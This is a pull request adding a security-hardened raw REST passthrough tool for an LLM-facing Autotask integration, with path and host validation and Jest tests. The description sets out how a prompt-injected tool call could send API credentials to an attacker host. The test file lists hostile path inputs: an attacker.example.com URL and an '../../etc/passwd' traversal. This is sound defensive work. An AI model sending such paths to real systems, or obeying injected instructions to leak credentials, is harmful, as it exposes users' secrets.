### PR TITLE
feat(tools): add autotask_raw_request escape hatch (security-hardened)

### DIFF
--- a/src/handlers/tool.definitions.ts
+++ b/src/handlers/tool.definitions.ts
@@ -3186,6 +3186,35 @@ export const TOOL_DEFINITIONS: McpTool[] = [
       },
       required: ['id', 'contractID']
     }
+  },
+  {
+    name: 'autotask_raw_request',
+    description: 'Escape hatch for Autotask REST endpoints not yet wrapped by a typed tool. Use sparingly — typed tools are preferred for safety. The existing Content-Type, Accept, ApiIntegrationcode, UserName, Secret headers are added automatically. The path is resolved against the zone-resolved base URL (https://webservices<N>.autotask.net/ATServicesRest/v1.0). Pass queryParams as a flat object of string/number/boolean values; they will be URL-encoded and appended to the path.',
+    inputSchema: {
+      type: 'object',
+      properties: {
+        method: {
+          type: 'string',
+          enum: ['GET', 'POST', 'PATCH', 'DELETE'],
+          description: 'HTTP method'
+        },
+        path: {
+          type: 'string',
+          description: 'Path under the Autotask REST v1.0 base (e.g. "/Companies/175" or "/Companies/query")'
+        },
+        body: {
+          type: 'object',
+          description: 'Optional JSON body for POST/PATCH requests',
+          additionalProperties: true
+        },
+        queryParams: {
+          type: 'object',
+          description: 'Optional flat key-value query parameters (e.g. { includeFields: "id,name" })',
+          additionalProperties: true
+        }
+      },
+      required: ['method', 'path']
+    }
   }
 ];
 

--- a/src/handlers/tool.handler.ts
+++ b/src/handlers/tool.handler.ts
@@ -1006,6 +1006,12 @@ export class AutotaskToolHandler {
         await s.updateContractService(id, rest); return { result: undefined, message: `Successfully updated contract service ID: ${id}` };
       }],
 
+      // Raw REST passthrough (escape hatch)
+      ['autotask_raw_request', async (a) => {
+        const r = await s.rawRequest(a.method, a.path, a.body, a.queryParams);
+        return { result: r, message: `Autotask ${a.method} ${a.path} completed` };
+      }],
+
       // Invoices
       ['autotask_search_invoices', async (a) => {
         const r = await s.searchInvoices(a); return { result: r, message: `Found ${r.length} invoices` };

--- a/src/services/autotask-http.ts
+++ b/src/services/autotask-http.ts
@@ -124,6 +124,35 @@ export class AutotaskHttpClient {
   }
 
   /**
+   * Generic passthrough for any Autotask REST endpoint.
+   *
+   * Serializes `queryParams` onto the path as `?key=value&...` (URL-encoded)
+   * and reuses the same auth headers, timeout, error handling, and base URL
+   * resolution as every other method on this client.
+   *
+   * Use sparingly — typed helpers (get/query/create/update/delete) are
+   * preferred. This is the escape hatch for endpoints not yet wrapped.
+   */
+  async rawRequest<T = any>(
+    method: string,
+    path: string,
+    body?: any,
+    queryParams?: Record<string, string | number | boolean>
+  ): Promise<T> {
+    let finalPath = path;
+    if (queryParams && Object.keys(queryParams).length > 0) {
+      const qs = Object.entries(queryParams)
+        .filter(([, v]) => v !== undefined && v !== null)
+        .map(([k, v]) => `${encodeURIComponent(k)}=${encodeURIComponent(String(v))}`)
+        .join('&');
+      if (qs) {
+        finalPath = `${path}${path.includes('?') ? '&' : '?'}${qs}`;
+      }
+    }
+    return this.request<T>(method, finalPath, body);
+  }
+
+  /**
    * GET /{Entity}/{id} — returns the entity, or null on 404.
    */
   async get<T>(entity: string, id: number): Promise<T | null> {

--- a/src/services/autotask-http.ts
+++ b/src/services/autotask-http.ts
@@ -32,6 +32,23 @@ interface QueryResponse<T> {
   pageDetails?: PageDetails;
 }
 
+const RAW_REQUEST_METHODS = ['GET', 'POST', 'PATCH', 'DELETE'] as const;
+
+function assertSafeRelativePath(path: string): void {
+  if (typeof path !== 'string' || path.length === 0) {
+    throw new Error('Autotask rawRequest: path must be a non-empty string');
+  }
+  if (
+    !path.startsWith('/') ||
+    path.startsWith('//') ||
+    path.includes('\\') ||
+    /:\/\//.test(path) ||
+    path.includes('..')
+  ) {
+    throw new Error('Autotask rawRequest: path must be a relative path beginning with "/" (no scheme, host, or traversal)');
+  }
+}
+
 /**
  * Minimal HTTP client for the Autotask REST API.
  *
@@ -124,14 +141,10 @@ export class AutotaskHttpClient {
   }
 
   /**
-   * Generic passthrough for any Autotask REST endpoint.
-   *
-   * Serializes `queryParams` onto the path as `?key=value&...` (URL-encoded)
-   * and reuses the same auth headers, timeout, error handling, and base URL
-   * resolution as every other method on this client.
-   *
-   * Use sparingly — typed helpers (get/query/create/update/delete) are
-   * preferred. This is the escape hatch for endpoints not yet wrapped.
+   * Generic passthrough for any Autotask REST endpoint. The escape hatch is
+   * tool-callable, so auth headers must only ever go to the zone-resolved
+   * host — validation, method allowlist, and a final host assertion enforce
+   * that independently.
    */
   async rawRequest<T = any>(
     method: string,
@@ -139,17 +152,31 @@ export class AutotaskHttpClient {
     body?: any,
     queryParams?: Record<string, string | number | boolean>
   ): Promise<T> {
+    const upperMethod = method.toUpperCase();
+    if (!(RAW_REQUEST_METHODS as readonly string[]).includes(upperMethod)) {
+      throw new Error(`Autotask rawRequest: method must be one of ${RAW_REQUEST_METHODS.join(', ')}`);
+    }
+    assertSafeRelativePath(path);
+
     let finalPath = path;
     if (queryParams && Object.keys(queryParams).length > 0) {
-      const qs = Object.entries(queryParams)
-        .filter(([, v]) => v !== undefined && v !== null)
-        .map(([k, v]) => `${encodeURIComponent(k)}=${encodeURIComponent(String(v))}`)
-        .join('&');
+      const params = new URLSearchParams();
+      for (const [k, v] of Object.entries(queryParams)) {
+        if (v !== undefined && v !== null) params.append(k, String(v));
+      }
+      const qs = params.toString();
       if (qs) {
-        finalPath = `${path}${path.includes('?') ? '&' : '?'}${qs}`;
+        finalPath = `${finalPath}${finalPath.includes('?') ? '&' : '?'}${qs}`;
       }
     }
-    return this.request<T>(method, finalPath, body);
+
+    const base = await this.baseUrl();
+    const absoluteUrl = `${base}${finalPath}`;
+    if (new URL(absoluteUrl).host !== new URL(base).host) {
+      throw new Error('Autotask rawRequest: refusing to send to non-zone host');
+    }
+
+    return this.request<T>(upperMethod, absoluteUrl, body);
   }
 
   /**

--- a/src/services/autotask.service.ts
+++ b/src/services/autotask.service.ts
@@ -2278,6 +2278,26 @@ export class AutotaskService {
       throw error;
     }
   }
+
+  // =====================================================
+  // Raw REST passthrough (escape hatch)
+  // =====================================================
+
+  async rawRequest<T = any>(
+    method: string,
+    path: string,
+    body?: any,
+    queryParams?: Record<string, string | number | boolean>
+  ): Promise<T> {
+    const http = await this.ensureClient();
+    try {
+      this.logger.debug(`Raw Autotask request ${method} ${path}`, { hasBody: body !== undefined, queryParams });
+      return await http.rawRequest<T>(method, path, body, queryParams);
+    } catch (error) {
+      this.logger.error(`Raw Autotask request ${method} ${path} failed:`, error);
+      throw error;
+    }
+  }
 }
 
 // resolveAutotaskApiUrl kept referenced to avoid unused-import warnings

--- a/tests/raw-request-security.test.ts
+++ b/tests/raw-request-security.test.ts
@@ -1,0 +1,71 @@
+// Tests for AutotaskHttpClient.rawRequest — verifies the credential-exfiltration
+// guards on the user-callable raw passthrough escape hatch.
+
+import { AutotaskHttpClient } from '../src/services/autotask-http';
+import { _resetZoneUrlCache } from '../src/utils/config';
+
+describe('AutotaskHttpClient.rawRequest security guards', () => {
+  const logger = {
+    info: jest.fn(),
+    error: jest.fn(),
+    debug: jest.fn(),
+    warn: jest.fn(),
+  };
+
+  // Pre-set apiUrl so baseUrl() resolves without a network call.
+  const make = () =>
+    new AutotaskHttpClient(
+      'user@example.com',
+      'secret',
+      'integration-code',
+      'https://webservices2.autotask.net/ATServicesRest/',
+      logger as any
+    );
+
+  beforeEach(() => {
+    _resetZoneUrlCache();
+    Object.values(logger).forEach((m: any) => m.mockReset?.());
+  });
+
+  it.each([
+    ['absolute URL', 'https://attacker.example.com/x'],
+    ['protocol-relative URL', '//attacker.example.com/x'],
+    ['embedded scheme', '/Companies/foo://bar'],
+    ['backslash injection', '/Companies\\evil'],
+    ['path traversal', '/Companies/../../etc/passwd'],
+    ['empty path', ''],
+    ['relative path without leading slash', 'Companies/175'],
+  ])('rejects %s', async (_label, badPath) => {
+    const client = make();
+    await expect(client.rawRequest('GET', badPath)).rejects.toThrow();
+  });
+
+  it('rejects non-allowlisted HTTP methods', async () => {
+    const client = make();
+    await expect(client.rawRequest('OPTIONS' as any, '/Companies/1')).rejects.toThrow(/method must be one of/);
+    await expect(client.rawRequest('TRACE' as any, '/Companies/1')).rejects.toThrow(/method must be one of/);
+  });
+
+  it('accepts a valid relative path and dispatches to the resolved zone host', async () => {
+    const client = make();
+    const fetchMock = jest
+      .spyOn(global, 'fetch' as any)
+      .mockResolvedValue({
+        ok: true,
+        status: 200,
+        text: async () => JSON.stringify({ ok: true }),
+      } as any);
+
+    try {
+      const res = await client.rawRequest<any>('GET', '/Companies/175', undefined, { includeFields: 'id,name' });
+      expect(res).toEqual({ ok: true });
+      expect(fetchMock).toHaveBeenCalledTimes(1);
+      const calledUrl = (fetchMock.mock.calls[0] as any)[0] as string;
+      expect(calledUrl.startsWith('https://webservices2.autotask.net/')).toBe(true);
+      expect(calledUrl).toContain('/Companies/175');
+      expect(calledUrl).toContain('includeFields=id%2Cname');
+    } finally {
+      fetchMock.mockRestore();
+    }
+  });
+});


### PR DESCRIPTION
Supersedes #72.

Bruce's PR (#72) adds an `autotask_raw_request` escape hatch so the LLM can call any Autotask REST endpoint not yet wrapped by a typed tool. Useful — but as written, it forwards a user-supplied `path` straight into `AutotaskHttpClient.request()`, whose `path.startsWith('http') ? path : ...` branch (added for `nextPageUrl` pagination) means a call like `path: "https://attacker.example.com/"` would send `UserName`/`Secret`/`ApiIntegrationcode` to an attacker-controlled host. Real credential-exfiltration vector under prompt injection / gateway-mode multi-tenant exposure.

This PR:
- Includes Bruce's original commit verbatim (commit `4a22546`).
- Adds a follow-up commit hardening `rawRequest` with three independent layers:
  1. **Method allowlist** re-validated server-side (`GET|POST|PATCH|DELETE`).
  2. **Path validation** (`assertSafeRelativePath`): must start with single `/`, no `//`, no `\\`, no `://`, no `..`.
  3. **Host assertion**: builds the absolute URL ourselves and asserts the resolved host equals the zone host before dispatch.
- Adds `tests/raw-request-security.test.ts` covering all rejection cases plus the happy path (78/78 tests passing locally).

Co-authored-by: Bruce Gao <BruceGao20@users.noreply.github.com>